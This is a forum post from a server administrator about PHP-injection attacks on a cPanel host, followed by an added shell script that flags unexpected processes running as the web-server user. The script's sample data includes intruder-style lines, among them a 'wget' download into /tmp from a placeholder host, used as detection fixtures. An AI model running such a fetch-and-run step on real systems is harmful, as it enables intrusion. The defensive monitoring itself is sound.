Yo dudes,
Recently we've been having issues on our cPanel box with people running old or outdated versions of PostNuke or similar PHP applications that have been found to have PHP injection exploits.
Of course, I've done all the typical security stuff like mounting temp directories noexec,nosuid, blocking user "nobody" from compiling and wgetting, etc., but that doesn't deter these foreign children from hacking these sites and just running Perl scripts. Of course, I have a setup in place that checks all the processes running as nobody against a list of whitelisted procs (httpd, proftpd, etc.), but it still ends up alerting me, sometimes at midnight.
Is there anything I've missed? I thought about making /usr/bin/perl non-executable by nobody, but I figure that will break all Perl CGI on the box.
Can anyone suggest anything? I can always clean this attack up, but only after it happens. I've taken to chmod 000'ing any vulnerable script as soon as it's exploited as well, so it can't be exploited again. This breaks the user's script, of course, but as far as I'm concerned, that's not really my problem :-)
I'm hoping there's something simple that I missed.
My unending thanks go out to all of you.
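The "processes running as nobody versus a whitelist" check described in the post, written out as an added example (this is not the poster's own script): it reads ps-style "user comm args" lines, keeps only those owned by the web-server user, and prints any whose command name is not on the allowed list. The whitelist (httpd, proftpd), the sample process listing, and the user name "nobody" are assumptions taken from the post; the sample data is constructed for the example. One caveat a practitioner should keep in mind: both the command name and the argument string shown by ps can be changed by the process itself (Perl scripts can assign to $0, and any process can rename itself with prctl(PR_SET_NAME) on Linux), so a bot that calls itself "httpd" would slip past a name-only check; comparing the target of /proc/PID/exe against the real binary paths is tighter.

```shell
#!/bin/sh
# Added example, not the original poster's script.
# Report processes owned by the web-server user whose command name is not whitelisted.

# Assumption from the post: these are the only command names expected to run as "nobody".
WHITELIST="httpd proftpd"

# find_rogue_procs USER
#   Reads lines of the form "user comm args..." on stdin (the shape produced by
#   `ps -eo user=,comm=,args=`) and prints those owned by USER whose comm is not
#   in $WHITELIST. Exit status is that of awk (0), so callers should test for output.
find_rogue_procs() {
    user="$1"
    awk -v user="$user" -v wl="$WHITELIST" '
        BEGIN { n = split(wl, names, " "); for (i = 1; i <= n; i++) ok[names[i]] = 1 }
        $1 == user && !($2 in ok) { print }
    '
}

# Constructed sample listing standing in for live `ps` output: two legitimate
# httpd workers, proftpd, and two processes an intruder might leave behind.
SAMPLE='root sshd /usr/sbin/sshd
nobody httpd /usr/local/apache/bin/httpd -DSSL
nobody httpd /usr/local/apache/bin/httpd -DSSL
nobody proftpd proftpd: (accepting connections)
nobody perl perl /tmp/.x/bot.pl
nobody sh sh -c cd /tmp; wget example.invalid/x'

# count_rogue: number of non-whitelisted processes in the sample (expected: 2).
count_rogue() {
    printf '%s\n' "$SAMPLE" | find_rogue_procs nobody | wc -l | tr -d ' '
}

# Live use from cron, alerting only when something unexpected shows up:
#   rogue=$(ps -eo user=,comm=,args= | find_rogue_procs nobody)
#   [ -n "$rogue" ] && printf '%s\n' "$rogue" | mail -s "rogue procs as nobody" root
```

Because the function only prints offenders, a cron wrapper that mails when the output is non-empty gives the same "alert me" behaviour the post describes, and swapping the comm column for the resolved path of /proc/PID/exe is a one-line change if name spoofing becomes a concern.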


